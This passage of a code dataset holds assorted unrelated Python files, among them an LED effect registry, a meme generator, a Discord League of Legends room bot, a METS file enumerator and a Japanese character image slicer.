ensure_future\nimport concurrent.futures\nimport voluptuous as 
vol\nfrom abc import ABC\nimport threading\nimport logging\nimport inspect\nimport importlib\nimport pkgutil\n\n_LOGGER = logging.getLogger(__name__)\n\ndef async_fire_and_forget(coro, loop):\n \"\"\"Run some code in the core event loop without a result\"\"\"\n\n if not coroutines.iscoroutine(coro):\n raise TypeError(('A coroutine object is required: {}').format(coro))\n\n def callback():\n \"\"\"Handle the firing of a coroutine.\"\"\"\n ensure_future(coro, loop=loop)\n\n loop.call_soon_threadsafe(callback)\n return\n\ndef async_callback(loop, callback, *args):\n \"\"\"Run a callback in the event loop with access to the result\"\"\"\n\n future = concurrent.futures.Future()\n def run_callback():\n try:\n future.set_result(callback(*args))\n # pylint: disable=broad-except\n except Exception as e:\n if future.set_running_or_notify_cancel():\n future.set_exception(e)\n else:\n _LOGGER.warning(\"Exception on lost future: \", exc_info=True)\n\n loop.call_soon_threadsafe(run_callback)\n return future\n\ndef hasattr_explicit(cls, attr):\n \"\"\"Returns if the given object has explicitly declared an attribute\"\"\"\n try:\n return getattr(cls, attr) != getattr(super(cls, cls), attr, None)\n except AttributeError:\n return False\n\ndef getattr_explicit(cls, attr, *default):\n \"\"\"Gets an explicit attribute from an object\"\"\"\n\n if len(default) > 1:\n raise TypeError(\"getattr_explicit expected at most 3 arguments, got {}\".format(\n len(default) + 2))\n\n if hasattr_explicit(cls, attr):\n return getattr(cls, attr, default)\n if default:\n return default[0]\n\n raise AttributeError(\"type object '{}' has no attribute '{}'.\".format(\n cls.__name__, attr))\n\nclass BaseRegistry(ABC):\n \"\"\"\n Base registry class used for effects and devices. This maintains a\n list of automatically registered base classes and assembles schema\n information\n\n The prevent registration for classes that are intended to serve as \n base classes (i.e. 
GradientEffect) add the following declarator:\n @Effect.no_registration\n \"\"\"\n _schema_attr = 'CONFIG_SCHEMA'\n\n def __init_subclass__(cls, **kwargs):\n \"\"\"Automatically register the class\"\"\"\n super().__init_subclass__(**kwargs)\n\n if not hasattr(cls, '_registry'):\n cls._registry = {}\n\n name = cls.__module__.split('.')[-1]\n cls._registry[name] = cls\n\n @classmethod\n def no_registration(self, cls):\n \"\"\"Clear registration entiry based on special declarator\"\"\"\n\n name = cls.__module__.split('.')[-1]\n del cls._registry[name]\n return cls\n\n @classmethod\n def schema(self, extended=True, extra=vol.ALLOW_EXTRA):\n \"\"\"Returns the extended schema of the class\"\"\"\n\n if extended is False:\n return getattr_explicit(type(self), self._schema_attr, vol.Schema({}))\n\n schema = vol.Schema({}, extra=extra)\n classes = inspect.getmro(self)[::-1]\n for c in classes:\n c_schema = getattr_explicit(c, self._schema_attr, None)\n if c_schema is not None:\n schema = schema.extend(c_schema.schema)\n\n return schema\n\n @classmethod\n def registry(self):\n \"\"\"Returns all the subclasses in the registry\"\"\"\n\n return self._registry\n\n @property\n def id(self):\n \"\"\"Returns the id for the object\"\"\"\n return getattr(self, '_id', None)\n\n @property\n def type(self):\n \"\"\"Returns the id for the object\"\"\"\n return getattr(self, '_type', None)\n\n @property\n def config(self):\n \"\"\"Returns the config for the object\"\"\"\n return getattr(self, '_config', None)\n\nclass RegistryLoader(object):\n \"\"\"Manages loading of compoents for a given registry\"\"\"\n\n def __init__(self, cls, package, ledfx):\n self._package = package\n self._ledfx = ledfx\n self._cls = cls\n self._objects = {}\n self._object_id = 1\n\n self.import_registry(package)\n\n def import_registry(self, package):\n \"\"\"\n Imports all the modules in the package thus hydrating\n the registry for the class\n \"\"\"\n\n found = self.discover_modules(package)\n 
_LOGGER.info(\"Importing {} from {}\".format(found, package))\n for name in found:\n importlib.import_module(name)\n\n def discover_modules(self, package):\n \"\"\"Discovers all modules in the package\"\"\"\n module = importlib.import_module(package)\n \n found = []\n for _, name, _ in pkgutil.iter_modules(module.__path__, package + '.'):\n found.append(name)\n \n return found\n\n def __iter__(self):\n return iter(self._objects)\n\n def types(self):\n \"\"\"Returns all the type strings in the registry\"\"\"\n return list(self._cls.registry().keys())\n\n def classes(self):\n \"\"\"Returns all the classes in the regsitry\"\"\"\n return self._cls.registry()\n\n def get_class(self, type):\n return self._cls.registry()[type]\n\n def values(self):\n \"\"\"Returns all the created objects\"\"\"\n return self._objects.values()\n\n def reload(self, force = False):\n \"\"\"Reloads the registry\"\"\"\n\n # TODO: Deteremine exactly how to reload. This seems to work sometimes\n # depending on the current state. 
Probably need to invalidate the\n # system cash to ensure everything gets reloaded\n self.import_registry(self._package)\n\n def create(self, name, config = {}, id = None, *args):\n \"\"\"Loads and creates a object from the registry by name\"\"\"\n\n if name not in self._cls.registry():\n raise AttributeError((\"Couldn't find '{}' in the {} registry\").format(\n name, self._cls.__name__.lower()))\n if id is None:\n id = self._object_id\n self._object_id = self._object_id + 1\n if id in self._objects:\n raise AttributeError((\"Object with id '{}' already created\").format(id))\n\n # Create the new object based on the registry entires and \n # validate the schema.\n _cls = self._cls.registry().get(name)\n if config is not None:\n config = _cls.schema()(config)\n obj = _cls(config, *args)\n else:\n obj = _cls(*args)\n\n # Attach some common properties\n setattr(obj, '_id', id)\n setattr(obj, '_type', name)\n\n # Store the object into the internal list and return it\n self._objects[id] = obj\n return obj\n\n def destroy(self, id):\n\n if id not in self._objects:\n raise AttributeError((\"Object with id '{}' does not exist.\").format(id))\n del self._objects[id]\n\n def get(self, id):\n return self._objects.get(id)","sub_path":"ledfxcontroller/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9527452","text":"from typing import List, Tuple\nimport scipy.stats\nimport numpy as np\n\n\ndef calculate_rank_sum_test(alternate_dist: List[int], reference_dist: List[int]) -> Tuple[float, float]:\n stat, pvalue = scipy.stats.ranksums(x=alternate_dist, y=reference_dist)\n return round(stat, 3), round(pvalue, 5)\n\n\ndef get_rank_sum_tests(distributions: dict, variant):\n stats = []\n pvalues = []\n for alt in variant.ALT:\n stat, pvalue = calculate_rank_sum_test(\n alternate_dist=distributions.get(alt, []),\n 
reference_dist=distributions.get(variant.REF, []))\n if not np.isnan(stat) and not np.isnan(pvalue):\n stats.append(str(stat))\n pvalues.append(str(pvalue))\n return pvalues, stats\n\n\n","sub_path":"vafator/rank_sum_test.py","file_name":"rank_sum_test.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563316984","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport sys\n\n\ndef except_handler(except_type, value, except_traceback):\n if hasattr(sys, 'ps1') or not sys.stderr.isatty():\n # we are in interactive mode or we don't have a tty-like\n # device, so we call the default hook\n sys.__excepthook__(except_type, value, except_traceback)\n else:\n import ipdb\n import traceback\n print(\"Uncaught exception:\", except_type, value)\n traceback.print_exc()\n ipdb.post_mortem(except_traceback)\n\n\nif __name__ == '__main__':\n try:\n sys.excepthook = except_handler\n print(subprocess.check_output(sys.argv[1:]).decode(\"utf-8\"))\n except BaseException:\n except_handler(*sys.exc_info())\n","sub_path":"common/code/snippets/py/post_mortem.py","file_name":"post_mortem.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"251929825","text":"import re\n\nmylist = ['a1.txt','a12.txt','a123.txt','a1234.txt']\n\n# 'a'와 '.txt' 사이에 숫자가 최소 3개이상인 항목들\n# dot(.)은 모든 문자를 의미 / [.]는 '.'문자를 의미하다.\nregex = '^a\\d{3,}[.]txt$'\npattern = re.compile(regex)\n\nfor item in mylist:\n if pattern.match(item):\n print(item,' 적합')\n else:\n print(item,' 부적합')","sub_path":"expression/regex01.py","file_name":"regex01.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"197262278","text":"from PySide import QtCore, QtGui\nimport sys\n\n\nclass SampleWindow(QtGui.QWidget):\n def __init__(self):\n 
super(SampleWindow, self).__init__()\n\n self.setWindowTitle(\"QSizePolicy\")\n self.resize(300, 150)\n label = QtGui.QLabel(\"Тек��т надписи\")\n label2 = QtGui.QLabel(\"Текст надписи\")\n\n policy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum,\n QtGui.QSizePolicy.Minimum)\n label.setFrameStyle(QtGui.QFrame.Box | QtGui.QFrame.Plain)\n label.setSizePolicy(policy)\n\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(label)\n vbox.addWidget(label2)\n self.setLayout(vbox)\n","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/003_Placing several components in the box/005_Class_QSizePolicy/089_Minimum2 - toClass.py","file_name":"089_Minimum2 - toClass.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"535325298","text":"#!/usr/bin/env python2\nimport synotil.ptn as sptn\nimport os,sys\nassert len(sys.argv)>1,'not enough arguments'\nIN=sys.argv[1]\nsp = IN.split('/')\nres = [ x for x in sp if sptn.get_runID(x) is not None]\nlenLst = (map(len, res));\nminIdx = min( range(len(lenLst)),key=lenLst.__getitem__)\nprint (res[minIdx])\n#print (sptn.get_runID(IN))\n","sub_path":"synoBio/getRunID.py","file_name":"getRunID.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298486195","text":"from PIL import Image, ImageDraw, ImageFont\nimport textwrap\nimport sys\n\n\ndef check(files):\n \"\"\"\n files : List of files\n\n For now, the program can only accept the following formats:\n .jpg, .jpeg, .png, .bmp\n\n Returns True of the file format belongs the above mentioned list.\n \"\"\"\n for file in files:\n try:\n Image.open(file)\n except FileNotFoundError:\n Image.open('files/noFiles.png').show()\n exit()\n\n file_format = file.split('.')[-1]\n if file_format not in ['jpg','jpeg','png','bmp']:\n Image.open('files/drake.png').show()\n print (\"Try again with supported file formats 
recommended by Drake\")\n exit()\n\n return True\n\ndef arrangeTwoImages(topImage, bottomImage):\n \"\"\"\n Arranges two images vertically\n \"\"\"\n firstImage = Image.open(topImage)\n firstImageWidth = firstImage.size[0]\n firstImageHeight = firstImage.size[1]\n\n secondImage = Image.open(bottomImage)\n secondImageWidth = secondImage.size[0]\n secondImageHeight = secondImage.size[1]\n\n newLayoutWidth = max(firstImageWidth, secondImageWidth)\n newLayoutHeight = firstImageHeight+secondImageHeight\n newLayout = Image.new('RGBA',(newLayoutWidth,newLayoutHeight),'white')\n newLayout.paste(firstImage,(0,0))\n newLayout.paste(secondImage,(0,firstImageHeight))\n newImage = newLayout.crop((0,0,firstImageWidth,newLayoutHeight))\n\n return newImage\n\ndef drawMeme(template):\n \"\"\"\n template : the image template\n\n Returns an image object of the finished meme\n \"\"\"\n meme = template\n meme_width, meme_height = template.size\n\n #Load Font\n font = ImageFont.truetype(font = './files/impact.ttf',size = int(meme_height/10))\n\n #Text\n top_text = input('Top text for your meme: ')\n bottom_text = input('Bottom text for your meme: ')\n\n # getting the width and height from 'font'\n char_width, char_height = font.getsize('A')\n\n # set limit for the number of characters per line\n char_per_line = meme_width // char_width\n\n top_text = textwrap.wrap(top_text.upper(), width = char_per_line)\n bottom_text = textwrap.wrap(bottom_text.upper(), width = char_per_line)\n\n draw = ImageDraw.Draw(meme)\n\n y = 10 #y-axis postion for the top text\n for line in top_text:\n line_width, line_height = font.getsize(line)\n x = (meme_width - line_width)/2\n draw.text((x, y), line, fill = 'white', font = font)\n y += line_height\n\n y = meme_height - char_height * len(bottom_text) - 15 # y-axis position for bottom text\n for line in bottom_text:\n line_width, line_height = font.getsize(line)\n x = (meme_width - line_width)/2\n draw.text((x, y), line, fill = 'white', font = font)\n y += 
line_height\n\n meme_name = input('Any name for your new meme? ')\n if len(meme_name) > 0:\n meme.save(f'{meme_name}.png')\n else:\n meme.save('FreshlyBrewedMeme.png')\n\n meme.show()\n\n\nif __name__ == \"__main__\":\n files = sys.argv[1:] #Loading the images\n\n if len(files) == 0:\n Image.open('files/empty.jpg').show()\n\n elif len(files) == 1:\n if check(files):\n template = Image.open(files[0])\n drawMeme(template)\n\n elif len(files) == 2:\n if check(files):\n template = arrangeTwoImages(files[0],files[1])\n drawMeme(template)\n else:\n Image.open('files/twoImagesOnly.png').show()\n","sub_path":"Final Project/CreateMeme.py","file_name":"CreateMeme.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"572022421","text":"import configparser\r\nfrom api import API\r\nimport discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport datetime\r\n\r\n\r\ndef getRoom(id):\r\n for room in rooms:\r\n if room.id == int(id):\r\n return room\r\n return -1 \r\n\r\ndef getNewNumber(ids, min, max):\r\n id = random.randint(min,max)\r\n while id in ids:\r\n id = random.randint(min,max)\r\n return id\r\n\r\n\r\nclass Player:\r\n def __init__(self, user):\r\n self.user = user\r\n self.champion = 0\r\n self.reroll_count = 2\r\n\r\nclass Room:\r\n def __init__(self):\r\n self.id = getNewNumber([room.id for room in rooms], 1000, 10000)\r\n self.players = [[],[]]\r\n self.player_count = 0\r\n self.champions = []\r\n\r\n def join(self, player, team):\r\n if player.user.id in [p.user.id for t in self.players for p in t]:\r\n player.champion = [p.champion for t in self.players for p in t if p.user.id == player.user.id][0]\r\n self.players = [[p for p in t if p.user.id != player.user.id] for t in self.players] \r\n self.player_count -= 1\r\n \r\n else:\r\n champ = getNewNumber(self.champions, 0, len(api.champions))\r\n player.champion = champ\r\n 
self.champions.append(champ)\r\n\r\n self.players[team].append(player)\r\n self.player_count += 1\r\n\r\n\r\nbot = commands.Bot(command_prefix='$', description=\"Almog's Leauge Bot\", help_command=None)\r\nrooms = []\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('We have logged in as {0.user}'.format(bot))\r\n\r\n@bot.command()\r\nasync def create(ctx):\r\n room_ = Room()\r\n rooms.append(room_) \r\n\r\n await ctx.send(f\"room created, id: {room_.id}\")\r\n await ShowRoom(ctx, room_.id)\r\n\r\n\r\n@bot.command()\r\nasync def help(ctx):\r\n embed = discord.Embed(title=f\"Help - Commands\", description=\"---------------\", timestamp=datetime.datetime.utcnow(), color=discord.Color.blue())\r\n \r\n embed.add_field(name=\"$create\",value=f\"create a room\", inline=False)\r\n embed.add_field(name=\"$join \",value=\"join room and team\", inline=False)\r\n embed.add_field(name=\"$room \",value=f\"shows the teams and the champions in a room\", inline=False)\r\n\r\n await ctx.send(embed=embed)\r\n \r\n@bot.command()\r\nasync def join(ctx, room_id, team):\r\n room_ = getRoom(room_id)\r\n if room_ != -1:\r\n player = Player(user=ctx.message.author)\r\n if room_.player_count == 10:\r\n await ctx.send(f\"Room {room_id} is full\")\r\n else:\r\n if int(team)>2 or int(team)<1:\r\n await ctx.send(\"Team number out of range\")\r\n else:\r\n room_.join(player=player, team=int(team)-1)\r\n await ctx.send(f\"{player.user.mention} joined room {room_id}\")\r\n await ShowRoom(ctx, room_id)\r\n else:\r\n await ctx.send(f\"Room {room_id} does not exist\")\r\n\r\n\r\n@bot.command()\r\nasync def ShowRoom(ctx, room_id):\r\n room = getRoom(room_id)\r\n if room != -1:\r\n embed = discord.Embed(title=f\"Room {room_id}\", description=\"---------------\", timestamp=datetime.datetime.utcnow(), color=discord.Color.blue())\r\n \r\n data = \"none\" if len(room.players[0]) == 0 else '\\n'.join([f\"{player.user.mention}-{api.champions[player.champion]}-{player.reroll_count}\" for player in 
room.players[0]])\r\n embed.add_field(name=\"Team 1\",value=f\"{data}\\n\", inline=True)\r\n \r\n data = \"none\" if len(room.players[1]) == 0 else '\\n'.join([f\"{player.user.mention}-{api.champions[player.champion]}-{player.reroll_count}\" for player in room.players[1]])\r\n embed.add_field(name=\"Team 2\",value=f\"{data}\\n\", inline=True)\r\n \r\n await ctx.send(embed=embed)\r\n \r\n else:\r\n await ctx.send(f\"Room {room_id} does not exist\")\r\n\r\n\r\n@bot.command()\r\nasync def reroll(ctx):\r\n if ctx.message.author.id in [player.user.id for r in rooms for team in r.players for player in team]:\r\n for r in rooms:\r\n for team in r.players:\r\n for player in team:\r\n if player.user.id == ctx.message.author.id and player.reroll_count > 0:\r\n champ = getNewNumber(r.champions, 0, len(api.champions))\r\n r.champions.remove(player.champion)\r\n \r\n player.champion = champ\r\n r.champions.append(champ)\r\n player.reroll_count -= 1\r\n\r\n await ShowRoom(ctx, r.id)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n config = configparser.ConfigParser()\r\n config.read('config.ini')\r\n\r\n api = API(config['League of Legends API']['token'])\r\n bot.run(config['Discord']['token'])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"381229145","text":"\"\"\"Version information.\"\"\"\nimport tomlkit\nimport os\nfrom pathlib import Path\n\ndef _get_project_meta():\n try:\n toml_path = Path(__file__).parent.parent.joinpath('pyproject.toml')\n with open(toml_path) as pyproject:\n file_contents = pyproject.read()\n\n return tomlkit.parse(file_contents)['tool']['poetry']\n except:\n return \"version_not_found\"\n \n\npkg_meta = _get_project_meta()\n\n# We use the version from pyproject.toml\n__version__ = 
str(pkg_meta['version'])\n","sub_path":"tibanna_ffcommon/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"301572877","text":"import os\nimport re\nimport settings\nfrom s3_keys import get_matching_s3_keys\n\n# Unlike the DDS implementation of this, only get b numbers that are correctly arranged\n# in their 4-level file structure\n\n# provide \"/\" to enumerate all, or be more selective and pass \"/5/5...\" etc.\n\nvalid_dir_names = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"x\"]\n\n\ndef b_numbers_from_fileshare(start_at):\n b_number_pattern = re.compile(r\"\\A(b[0-9ax]{8}).xml\\Z\")\n mets_root = os.path.join(settings.METS_FILESYSTEM_ROOT, start_at)\n for dirpath, _, filenames in os.walk(mets_root, topdown=True):\n this_dir = os.path.dirname(dirpath)\n if os.path.basename(this_dir) in valid_dir_names:\n for f in filenames:\n m = b_number_pattern.match(f)\n if m:\n yield m.group(1)\n\n\ndef b_numbers_from_s3(filter=\"\"):\n # We don't just want to enumerate all the keys in the bucket, as the majority of\n # keys will be for ALTO files (one per image), with multiple manifestations as well.\n\n # options:\n # 1: Issue a prefix query for each level 4 directory, from mets/0/0/0/0 to mets/x/9/9/9\n # - this will yield a lot of missing keys, involves 11000 queries\n # 2: make a prefix query for mets/ and just keep iterating. Can we skip ahead when we find ALTO?\n # underlying AWS API query has page size of 1000, so will involve 20,000 queries to S3 if we do that\n # 3. use the /nets_only prefix. This \"folder\" omits the ALTO files, so will only contain\n # METS for b numbers and multiple manifestations. 
Although we don't need the MMs, they will only make\n # up a third or so of the total keys, and we can skip them.\n\n # 3 seems most efficient\n prefix = settings.METS_ONLY_ROOT_PREFIX\n b_number_pattern = re.compile(r\"\\A\" + prefix + r\"[0-9ax/]*/(b[0-9ax]{8}).xml\\Z\")\n for key in get_matching_s3_keys(\n bucket=settings.METS_BUCKET_NAME, prefix=prefix + filter\n ):\n m = b_number_pattern.match(key)\n if m:\n yield m.group(1)\n","sub_path":"archive/bagger/src/mets_filesource.py","file_name":"mets_filesource.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"537077882","text":"'''Data-reader for basketball data\n'''\nfrom __future__ import print_function\n\nimport datetime, itertools, os, sys, math, traceback\nimport numpy as np\nimport struct\nfrom os.path import join as pjoin\n\nroot_prefix = \"/Users/stephanzheng/projects/rl/bball/ball_prediction/data\"\n\ndata_dir = os.path.join(root_prefix, \"bin\")\noutput_dir = os.path.join(root_prefix, \"out\")\n\nnum_seconds = 8\nframes_per_second = 25\nnum_players = 10\nnum_balls = 1\nnum_bytes_per_index = 1\nnum_indices_per_frame = 2\n\nfilename = \"00001.bin\"\n\nwith open(pjoin(data_dir, filename), \"rb\") as infile:\n bytes = infile.read()\n filesize = len(bytes)\n print(\"file has\", filesize, \"bytes\")\n\nassert filesize % num_bytes_per_index == 0\nnum_indices = filesize / num_bytes_per_index\n\nindices = np.zeros(num_indices, dtype=np.uint8)\n\nwith open(pjoin(data_dir, filename), \"rb\") as infile:\n for idx in xrange(num_indices):\n bytes = infile.read(num_bytes_per_index)\n if not bytes:\n break\n indices[idx] = ord(bytes)\n\nindices = indices.reshape(num_seconds * frames_per_second, num_players + num_balls, num_indices_per_frame)\n\nfor t in xrange(10):\n print(\"time\", 10*t, \"indices\", 
indices[10*t])\n","sub_path":"data/data_reader_test.py","file_name":"data_reader_test.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"99664300","text":"import numpy as np\nimport cv2 as cv\nimport csv\nimport os\n\ncsv_file_location = \"data/csv/\"\npng_file_location = \"data/png/\"\n\ncsv_file_1 = \"ETL7LC_01.csv\"\npng_files_1 = [\"ETL7LC_1_00.png\", \"ETL7LC_1_01.png\", \"ETL7LC_1_02.png\", \"ETL7LC_1_03.png\", \"ETL7LC_1_04.png\"]\ncsv_file_2 = \"ETL7LC_02.csv\"\npng_files_2 = [\"ETL7LC_2_00.png\", \"ETL7LC_2_01.png\", \"ETL7LC_2_02.png\", \"ETL7LC_2_03.png\"]\n\ncsv_file_3 = \"ETL7SC_01.csv\"\npng_files_3 = [\"ETL7SC_1_00.png\", \"ETL7SC_1_01.png\", \"ETL7SC_1_02.png\", \"ETL7SC_1_03.png\", \"ETL7SC_1_04.png\"]\ncsv_file_4 = \"ETL7SC_02.csv\"\npng_files_4 = [\"ETL7SC_2_00.png\", \"ETL7SC_2_01.png\", \"ETL7SC_2_02.png\", \"ETL7SC_2_03.png\"]\n\ncharacter_entries = []\n\nentry_index = 0\n\noutput_directory = \"SlicedData\"\npng_folder = os.path.join(output_directory, \"png\")\ngt_file = os.path.join(output_directory, \"gt.txt\")\n\ndef extractImages(csv_file, png_files, disable_thresholding):\n character_entries.clear()\n print(\"opening \", csv_file)\n target_csv_file = csv_file_location + csv_file\n with open(target_csv_file, newline='') as read_file:\n reader = csv.DictReader(read_file)\n for row in reader:\n character_entries.append(row['Character Code'].strip())\n \n if not os.path.exists(png_folder):\n os.mkdir(output_directory)\n os.mkdir(png_folder)\n\n png_index = 1\n global entry_index\n x = 0\n y = 0\n\n img = cv.imread(png_file_location + png_files[0])\n \n kernel = np.ones((2,2), np.uint8)\n with open(gt_file, \"a\") as file:\n for entry in character_entries:\n new_png_name = str(entry_index)+\"_\"+entry+\".png\"\n new_png_path = os.path.join(png_folder, new_png_name)\n \n sub_png_img = img[y:y+63, x:x+64]\n if not disable_thresholding:\n ret, 
sub_png_img = cv.threshold(sub_png_img, 150, 255, cv.THRESH_BINARY)\n\n sub_png_img = cv.cvtColor(sub_png_img, cv.COLOR_BGR2GRAY)\n dilation = cv.dilate(sub_png_img, kernel, iterations=1)\n \n # cv.imshow(\"sample\", dilation)\n # cv.waitKey()\n # cv.destroyAllWindows()\n\n cv.imwrite(new_png_path, dilation)\n file.writelines(new_png_path + \"\\t\" + entry + \"\\n\")\n entry_index = entry_index + 1\n x = x + 64\n if x == 3200:\n x = 0\n y = y + 63\n if y >= 2520:\n y = 0\n img = cv.imread(png_file_location + png_files[png_index])\n png_index = png_index + 1\n\n\n# New implementation keeps more details of the image. \n# uing normal threshold removes a lot of \"smoothness\"\n# However, this function is incredibly slow! It is possible\n# to add multi threading to this function.\ndef newExtractImages(csv_file, png_files):\n character_entries.clear()\n print(\"opening \", csv_file)\n target_csv_file = csv_file_location + csv_file\n with open(target_csv_file, newline='') as read_file:\n reader = csv.DictReader(read_file)\n for row in reader:\n character_entries.append(row['Character Code'].strip())\n \n if not os.path.exists(png_folder):\n os.mkdir(output_directory)\n os.mkdir(png_folder)\n\n png_index = 1\n global entry_index\n x = 0\n y = 0\n\n img = cv.imread(png_file_location + png_files[0])\n kernel = np.ones((2,2), np.uint8)\n with open(gt_file, \"a\") as file:\n for entry in character_entries:\n new_png_name = str(entry_index)+\"_\"+entry+\".png\"\n new_png_path = os.path.join(png_folder, new_png_name)\n \n sub_png_img = img[y:y+63, x:x+64]\n #sub_png_img = cv.cvtColor(sub_png_img, cv.COLOR_BGR2GRAY)\n #\n #denoised_img = cv.fastNlMeansDenoising(sub_png_img, None, h=40)\n #adapt_thresh = cv.adaptiveThreshold(denoised_img, 255,\n # cv.ADAPTIVE_THRESH_GAUSSIAN_C,\n # cv.THRESH_BINARY, 23, -2)\n #dilation_adapt_thresh = cv.dilate(adapt_thresh, kernel, iterations=1)\n \n #ret, hard_thresh = cv.threshold(sub_png_img, 150, 255, cv.THRESH_BINARY)\n #dilation_hard_thresh 
= cv.dilate(hard_thresh, kernel, iterations=1)\n\n #cv.imshow(\"Base image\", sub_png_img)\n ##cv.imshow(\"Denoised Image\", denoised_img)\n #cv.imshow(\"adapt_thresh\", adapt_thresh)\n #cv.imshow(\"dilation_adapt_thresh\", dilation_adapt_thresh)\n #\n #cv.imshow(\"hard_thresh\", hard_thresh)\n #cv.imshow(\"dilation_hard_thresh\", dilation_hard_thresh)e\n #cv.waitKey()\n #cv.destroyAllWindows()\n\n #cv.imwrite(new_png_path, dilation_adapt_thresh)\n cv.imwrite(new_png_path, sub_png_img)\n \n file.writelines(new_png_path + \"\\t\" + entry + \"\\n\")\n entry_index = entry_index + 1\n x = x + 64\n if x == 3200:\n x = 0\n y = y + 63\n if y >= 2520:\n y = 0\n img = cv.imread(png_file_location + png_files[png_index])\n png_index = png_index + 1 \n\nif __name__ == \"__main__\":\n newExtractImages(csv_file_1, png_files_1)\n newExtractImages(csv_file_2, png_files_2)\n newExtractImages(csv_file_3, png_files_3)\n newExtractImages(csv_file_4, png_files_4)\n\n disable_thresholding = False\n\n # extractImages(csv_file_1, png_files_1, disable_thresholding)\n # extractImages(csv_file_2, png_files_2, disable_thresholding)\n # extractImages(csv_file_3, png_files_3, disable_thresholding)\n # extractImages(csv_file_4, png_files_4, disable_thresholding)\n ","sub_path":"ETL_Extraction.py","file_name":"ETL_Extraction.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"601257189","text":"#!/usr/bin/python3\n\n# Copyright (c) 2020, Intel Corporation\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or 
other materials provided with the distribution.\n# * Neither the name of Intel Corporation nor the names of its contributors\n# may be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n# generate split perf json files from a single perf json files\n# mapfile still needs to be updated separately\nfrom __future__ import print_function\nimport os\nimport itertools\nimport json\nimport argparse\nimport sys\nimport perfjson\n\nsys.path.append(os.path.dirname(sys.argv[0]))\n\nap = argparse.ArgumentParser()\nap.add_argument('jsonfile', type=argparse.FileType('r'), help=\"Input json file\")\nap.add_argument('--outdir', default='.')\nap.add_argument('--unit', default='')\nargs = ap.parse_args()\n\noname = perfjson.gen_oname(args.jsonfile.name).replace(\".json\", \"\").split(\"_\")[0]\njf = json.load(args.jsonfile)\nperfjson.cleanjf(jf)\njf = perfjson.del_dup_events(jf)\njf = map(perfjson.fix_names, jf)\njf = perfjson.del_special_events(jf)\n\nif args.unit:\n jf = perfjson.add_unit(jf, args.unit)\n\njf = sorted(jf, key=lambda x: x[\"Topic\"])\n\nfor topic, nit in itertools.groupby(jf, lambda x: x[\"Topic\"]):\n def del_topic(n):\n del 
